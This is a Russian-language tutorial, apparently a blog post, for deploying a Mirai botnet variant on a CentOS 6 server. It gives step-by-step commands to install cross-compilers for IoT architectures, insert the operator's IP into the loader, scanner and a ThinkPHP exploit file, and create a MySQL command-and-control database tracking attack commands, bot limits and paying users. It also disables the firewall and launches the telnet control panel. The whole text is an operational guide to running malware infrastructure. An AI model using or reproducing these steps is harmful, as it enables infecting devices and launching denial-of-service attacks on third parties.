December 27, 2020

Устанавливаем Mirai BotNet

Привет!

Данный ботнет написан на языке C & GO.

Необходимости

1. Сервер на CentOS 6.* (не выше 6, могут быть ошибки)

2. PuTTy + mobaXterm

Суть:

Обновление и установка

sudo su

yum update -y

yum install epel-release -y

yum groupinstall "Development Tools" -y

yum install gmp-devel -y

ln -s /usr/lib64/libgmp.so.3 /usr/lib64/libgmp.so.10

yum install screen wget bzip2 gcc nano gcc-c++ electric-fence sudo git libc6-dev httpd xinetd tftpd tftp-server mysql mysql-server gcc glibc-static -y

mkdir /etc/xcompile

cd /etc/xcompile

wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2

wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2

wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2

wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2

wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2

wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2

wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2

wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2

wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2

wget https://landley.net/aboriginal/downloads/old/binaries/1.2.6/cross-compiler-armv7l.tar.bz2

tar -jxf cross-compiler-i586.tar.bz2

tar -jxf cross-compiler-m68k.tar.bz2

tar -jxf cross-compiler-mips.tar.bz2

tar -jxf cross-compiler-mipsel.tar.bz2

tar -jxf cross-compiler-powerpc.tar.bz2

tar -jxf cross-compiler-sh4.tar.bz2

tar -jxf cross-compiler-sparc.tar.bz2

tar -jxf cross-compiler-armv4l.tar.bz2

tar -jxf cross-compiler-armv5l.tar.bz2

tar -jxf cross-compiler-armv6l.tar.bz2

tar -jxf cross-compiler-armv7l.tar.bz2

rm -rf *.tar.bz2

mv cross-compiler-i586 i586

mv cross-compiler-m68k m68k

mv cross-compiler-mips mips

mv cross-compiler-mipsel mipsel

mv cross-compiler-powerpc powerpc

mv cross-compiler-sh4 sh4

mv cross-compiler-sparc sparc

mv cross-compiler-armv4l armv4l

mv cross-compiler-armv5l armv5l

mv cross-compiler-armv6l armv6l

mv cross-compiler-armv7l armv7l

cd /tmp

wget https://dl.google.com/go/go1.13.5.linux-amd64.tar.gz

tar -xvf go1.13.5.linux-amd64.tar.gz

mv go /usr/local

export GOROOT=/usr/local/go

export GOPATH=$HOME/Projects/Proj1

export PATH=$GOPATH/bin:$GOROOT/bin:$PATH

go version

go env

cd ~/

go get github.com/go-sql-driver/mysql

go get github.com/mattn/go-shellwords

С этим разобрались. Далее изменим настройки ботнета под себя.

Что требуется заменить?

Заменить IP адреса на свои.

В файле /dlr/main.c (строка 6, так-же заменить точки в IP запятой)

В файле /stuff/thinkphp.c (строка 277)

В файле /stuff/stuff/includes.h (строка 25, 26 (20 не трогайте))

В файле /telnet/src/headers/config.h (строка 3, 6)

В файле ui/m.go (строка 10, заменить IP, 11 логин от MySQL, 12 пароль, от MySQL, 13 название БД (MySQL мы настроем позже)

Такс... это понятно! Давайте настроим MySQL.

Настройка MySQL

service mysqld start

mysql_secure_installation

1. Нажимаем Enter, и ставим пароль от root (такой-же как мы указывали в ui/m.go).

2. Далее везде отвечаем Y.

После того как сделали, можно настроить базу данных.

Создание БД

mysql -u root -p

И вводим пароль который мы установили.

use mysql

GRANT ALL ON *.* to root@'%' IDENTIFIED BY 'PASS';

FLUSH PRIVILEGES;

CREATE DATABASE Mana;

use Mana;

CREATE TABLE `history` (

`id` int(10) unsigned NOT NULL AUTO_INCREMENT,

`user_id` int(10) unsigned NOT NULL,

`time_sent` int(10) unsigned NOT NULL,

`duration` int(10) unsigned NOT NULL,

`command` text NOT NULL,

`max_bots` int(11) DEFAULT '-1',

PRIMARY KEY (`id`),

KEY `user_id` (`user_id`)

);

CREATE TABLE `users` (

`id` int(10) unsigned NOT NULL AUTO_INCREMENT,

`username` varchar(32) NOT NULL,

`password` varchar(32) NOT NULL,

`duration_limit` int(10) unsigned DEFAULT NULL,

`cooldown` int(10) unsigned NOT NULL,

`wrc` int(10) unsigned DEFAULT NULL,

`last_paid` int(10) unsigned NOT NULL,

`max_bots` int(11) DEFAULT '-1',

`admin` int(10) unsigned DEFAULT '0',

`intvl` int(10) unsigned DEFAULT '30',

`api_key` text,

PRIMARY KEY (`id`),

KEY `username` (`username`)

);

CREATE TABLE `whitelist` (

`id` int(10) unsigned NOT NULL AUTO_INCREMENT,

`prefix` varchar(16) DEFAULT NULL,

`netmask` tinyint(3) unsigned DEFAULT NULL,

PRIMARY KEY (`id`),

KEY `prefix` (`prefix`)

);

INSERT INTO users VALUES (NULL, 'LOGIN', 'PASS', 0, 0, 0, 0, -1, 1, 30, '');

CREATE TABLE `logins` (

`id` int(11) NOT NULL,

`username` varchar(32) NOT NULL,

`action` varchar(32) NOT NULL,

`ip` varchar(15) NOT NULL,

`timestamp` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP

) ENGINE=InnoDB DEFAULT CHARSET=latin1;

exit;

Просто скопируйте это, и вставьте в терминал.

Замените PASS во 2 строке, вставив туда пароль от root.

В строке INSERT INTO users, замените LOGIN и PASS, логином и паролем для доступа в панель управления.

С базой данных разобрались.

Осталось перекинуть файлы в директорию /root.

И ввести еще несколько команд.

Команды

Выключим службы которые могут нам мешать.

service iptables stop

Перезапустим службы.

service httpd restart

service mysqld restart

Готово!

Если вы перекинули файлы, то можно запускать наш ботнет!

для этого введем данные команды:

cd ~/

chmod 0777 * -R

sh build.sh

После этого отредактируем файл /usr/include/bits/typesizes.h

Пишем:

nano /usr/include/bits/typesizes.h

Спускаемся в самый низ, и заменяем 1024 на 999999.

Для запуска ботнета пишем:

screen ./ui

После этого в терминале должна появиться надпись:

[ Mana Ouma Bot Mirai Variant ]

Если эта надпись появилась, поздравляю, вы все сделали правильно!

Нажимаем CTRL + A + D, что-бы свернуть.

Вот и все! Вы установили данный ботнет!

Как подключится?

1. Открываем PyTTy.

2. Вводим ваш IP и порт 1791.

3. Ставим тип соединения: Telnet.

Подключаемся.

Вводим ваш логин и пароль.